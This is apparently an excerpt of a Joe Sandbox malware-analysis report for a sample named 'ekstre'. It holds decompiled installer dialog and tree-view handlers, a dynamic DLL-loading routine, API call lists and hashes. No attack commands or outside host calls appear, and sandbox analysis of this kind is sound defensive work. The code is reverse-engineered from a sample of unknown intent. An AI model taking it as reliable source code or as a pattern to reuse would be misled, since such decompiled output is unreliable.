0x6ddd2bcc
0x00000000
0x6ddd2bcc
0x6ddd2bbc
0x6ddd2bbc
0x00000000
0x6ddd2b94
0x6ddd2b94
0x6ddd2b9a
0x00000000
0x00000000
0x00000000
0x6ddd2b9a
0x6ddd2b92
0x6ddd2b2b
0x6ddd2b31
0x6ddd2b37
0x6ddd2b39
0x00000000
0x00000000
0x00000000
0x6ddd2b39
0x6ddd2aff
0x6ddd2b06
0x6ddd2b0c
0x6ddd2b12
0x00000000
0x6ddd2b12
0x6ddd2a73
0x6ddd2a76
0x6ddd2adc
0x6ddd2adc
0x6ddd2ae2
0x6ddd2ae5
0x00000000
0x00000000
0x6ddd2aeb
0x6ddd2aec
0x00000000
0x6ddd2af1
0x6ddd2a7b
0x00000000
0x00000000
0x6ddd2a81
0x6ddd2a81
0x6ddd2a84
0x6ddd2a8a
0x6ddd2a8c
0x6ddd2a95
0x00000000
0x00000000
0x6ddd2a9c
0x6ddd2aa7
0x6ddd2ab0
0x6ddd2ab6
0x6ddd2abc
0x6ddd2ac2
0x6ddd2ad5
0x00000000
0x6ddd2ad5

APIs

Part of subcall function 6DDD12F8: GlobalAlloc.KERNELBASE(00000040,?,6DDD11C4,-000000A0), ref: 6DDD1302

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6DDD294E
lstrcpyW.KERNEL32(00000008,?), ref: 6DDD29A4
lstrcpyW.KERNEL32(00000808,?), ref: 6DDD29AF
GlobalFree.KERNEL32(00000000), ref: 6DDD29C0
GlobalFree.KERNEL32(?), ref: 6DDD2A44
GlobalFree.KERNEL32(?), ref: 6DDD2A4A
GlobalFree.KERNEL32(?), ref: 6DDD2A50
GetModuleHandleW.KERNEL32(00000008), ref: 6DDD2B1A
LoadLibraryW.KERNEL32(00000008), ref: 6DDD2B2B
GetProcAddress.KERNEL32(?,?), ref: 6DDD2B82
lstrlenW.KERNEL32(00000808), ref: 6DDD2B9D

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: c4277a6b253f7141ac1da251f0ad34022764a41954bdeb7cfdae8f91205e9363
Instruction ID: 3c4a119e8fedd2487afd57a62309943ef804f1eb93847bbc696d39d83d5c5332
Opcode Fuzzy Hash: c4277a6b253f7141ac1da251f0ad34022764a41954bdeb7cfdae8f91205e9363
Instruction Fuzzy Hash: 6742A171A58302DFDBA5EF28C44076ABBE0FF89318F108A2EF5D9D6285E770D5448B91

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: b7ceee2424b0a3b83f9797e88165851be05e6588da5997c6d16d1a9b1b8990a9
Instruction ID: fb3f61e96e98deee36c7331a1bc93a87c3ebb652d9f25a3850070bd9d7c70ba4
Opcode Fuzzy Hash: b7ceee2424b0a3b83f9797e88165851be05e6588da5997c6d16d1a9b1b8990a9
Instruction Fuzzy Hash: F4F05E71904105EADB01DBB4ED49AAEB378EF14314F20457BE105F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x470288;
				_v28 =  *0x470270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x470279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x4018 + _t301 + 8) =  *(_t239 * 0x4018 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x4018 + _t301 + 8) =  *(_t239 * 0x4018 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x4018 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x470278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x44672c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x446740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x44672c = 0;
								 *0x446740 = 0;
								 *0x4702c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x470279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x446740;
									_t201 =  *0x470288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x47028c <= 0) {
										L86:
										if( *0x47031e == 0x400) {
											InvalidateRect(_v8, 0, "true");
										}
										if( *((intOrPtr*)( *0x46823c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x1006]);
									} while (_v24 <  *0x47028c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x446740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x4702c0 = _t291;
					 *0x446740 = GlobalAlloc(0x40,  *0x47028c << 2);
					_t258 = LoadImageW( *0x470260, 0x6e, 0, 0, 0, 0);
					 *0x446734 =  *0x446734 | 0xffffffff;
					_t297 = _t258;
					 *0x44673c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create("true", "true", 0x21, 6, 0);
					 *0x44672c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x44672c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, "true", 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x47028c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x446740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x446740 + _t300 * 4) = _t284;
									_v16 =  *( *0x446740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x4018]);
							_v32 = _t319;
						} while (_t300 <  *0x47028c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,?,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,?,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,?), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

, xrefs: 004055FF
M, xrefs: 004051E5
N, xrefs: 004052C6

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 32359cbaeecd44e88d718c242eccaed51119b9e2d2f0671df23d9d39e119ad45
Instruction ID: f7e32dcb43f150de83e4d77aaef29a32e3e137ec9d30c8444ea22e26c387a39b
Opcode Fuzzy Hash: 32359cbaeecd44e88d718c242eccaed51119b9e2d2f0671df23d9d39e119ad45
Instruction Fuzzy Hash: 60026C70900609EFDB20DFA9CD49AAF7BB5FB45314F10817AE614BA2E1D7798981CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x436714 =  *0x436714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x460200;
							if(_t103 - _t113 < 0x4000) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push("true");
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x470268, 0x111, "true", 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x470268, "true", 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x436714 != 0) {
						goto L27;
					} else {
						_t69 =  *0x43e720; // 0x71d69c
						_t29 = _t69 + 0x14; // 0x71d6b0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x46823c - 4 + _t75 * 4);
				}
				_t76 =  *0x470298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, "true", 0);
				_t92 =  *( *0x470270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x436714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x436714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048df
0x004048e4
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
